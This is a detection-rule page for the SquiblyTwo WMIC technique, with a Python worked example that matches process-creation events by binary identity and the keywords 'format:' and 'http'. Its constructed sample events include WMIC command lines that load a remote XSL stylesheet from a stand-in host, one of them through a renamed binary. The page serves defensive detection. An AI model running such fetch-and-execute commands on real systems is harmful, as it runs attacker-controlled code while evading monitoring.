
Summary
This detection rule identifies potential execution of the SquiblyTwo technique, which abuses WMIC (Windows Management Instrumentation Command-line) to run attacker-controlled script content. Specifically, the rule targets scenarios where WMIC may have been renamed or configured to evade detection. It does so by analysing Windows process creation logs, checking the filename, image hash, and command line for patterns that match the known behaviour of SquiblyTwo execution. The detection uses the 'Image', 'OriginalFileName', and 'Hashes' attributes derived from the PE (Portable Executable) file, focusing on specific hashes documented as part of the technique's signature. In addition, command lines that contain the keywords "format:" and "http" are monitored to supplement the identification. Together these conditions cover the execution vectors and configurations an attacker might use to run a payload through WMIC while attempting to remain undetected.
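The following is an added worked example, not part of the original rule page, showing how the conditions described above can be evaluated over Sysmon-style process creation events. It assumes the rule's structure is "the process is WMIC (by Image, OriginalFileName, or a documented hash) AND the command line contains both 'format:' and 'http'"; the exact boolean combination and the documented hash values are not given on the page, so the hash set is an obviously labelled placeholder and the sample events are constructed.

```python
"""Evaluate SquiblyTwo-style WMIC indicators over process creation events.

Assumed rule logic (not stated verbatim on the page):
  (Image ends with \\wmic.exe OR OriginalFileName == wmic.exe OR IMPHASH in known set)
  AND command line contains "format:" AND "http"
"""
from dataclasses import dataclass
from typing import Dict, List

# PLACEHOLDER: the rule references documented WMIC image hashes, but the
# page does not list them. Replace with the real values from the rule.
KNOWN_WMIC_IMPHASHES = {"PLACEHOLDER_IMPHASH_FROM_RULE"}


@dataclass
class ProcessEvent:
    image: str               # full path of the started executable
    original_file_name: str  # OriginalFileName from the PE version resource
    hashes: str              # Sysmon-style "SHA256=...,IMPHASH=..." string
    command_line: str


def parse_hashes(hashes: str) -> Dict[str, str]:
    """Split a Sysmon 'ALG=value,ALG=value' field into a dict, keys upper-cased."""
    out: Dict[str, str] = {}
    for part in hashes.split(","):
        if "=" in part:
            alg, val = part.split("=", 1)
            out[alg.strip().upper()] = val.strip().upper()
    return out


def is_wmic_binary(ev: ProcessEvent) -> bool:
    """True if the process is WMIC, even when the file on disk was renamed."""
    by_image = ev.image.lower().endswith("\\wmic.exe")
    by_original_name = ev.original_file_name.lower() == "wmic.exe"
    by_hash = parse_hashes(ev.hashes).get("IMPHASH", "") in KNOWN_WMIC_IMPHASHES
    return by_image or by_original_name or by_hash


def has_squiblytwo_cmdline(command_line: str) -> bool:
    """Keyword check from the rule: both 'format:' and 'http' must be present."""
    cmd = command_line.lower()
    return "format:" in cmd and "http" in cmd


def matches(ev: ProcessEvent) -> bool:
    return is_wmic_binary(ev) and has_squiblytwo_cmdline(ev.command_line)


def scan(events: List[ProcessEvent]) -> List[int]:
    """Return the indices of events that satisfy the rule."""
    return [i for i, ev in enumerate(events) if matches(ev)]


# Constructed sample events (not real telemetry); 192.0.2.0/24 is a documentation range.
SAMPLE_EVENTS = [
    # 0: benign inventory query from the genuine binary
    ProcessEvent(r"C:\Windows\System32\wbem\WMIC.exe", "wmic.exe",
                 "SHA256=AAAA,IMPHASH=BBBB", "wmic process list brief"),
    # 1: classic SquiblyTwo shape: remote stylesheet via /format
    ProcessEvent(r"C:\Windows\System32\wbem\WMIC.exe", "wmic.exe",
                 "SHA256=AAAA,IMPHASH=BBBB",
                 'wmic os get /format:"http://192.0.2.10/sample.xsl"'),
    # 2: renamed copy of WMIC; OriginalFileName still gives it away
    ProcessEvent(r"C:\Users\Public\svc.exe", "wmic.exe",
                 "SHA256=AAAA,IMPHASH=BBBB",
                 'svc.exe os get /format:"https://192.0.2.10/sample.xsl"'),
    # 3: not WMIC at all, keywords alone must not fire
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "PowerShell.EXE", "SHA256=CCCC,IMPHASH=DDDD",
                 "powershell -c Invoke-WebRequest http://192.0.2.10/format:x"),
    # 4: WMIC with a local, built-in output format and no URL
    ProcessEvent(r"C:\Windows\System32\wbem\WMIC.exe", "wmic.exe",
                 "SHA256=AAAA,IMPHASH=BBBB", "wmic os get /format:list"),
]

if __name__ == "__main__":
    for i in scan(SAMPLE_EVENTS):
        print(f"event {i} matches: {SAMPLE_EVENTS[i].command_line}")
```

Event 2 is the case the rule's 'OriginalFileName' and 'Hashes' checks exist for: renaming the binary changes 'Image' but not the PE version resource or the import hash, so the identity test still succeeds. Event 3 shows why the keyword check is gated on binary identity rather than applied alone.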
Categories
- Windows
- Endpoint
Data Sources
- Process
ATT&CK Techniques
- T1220
Created: 2019-01-16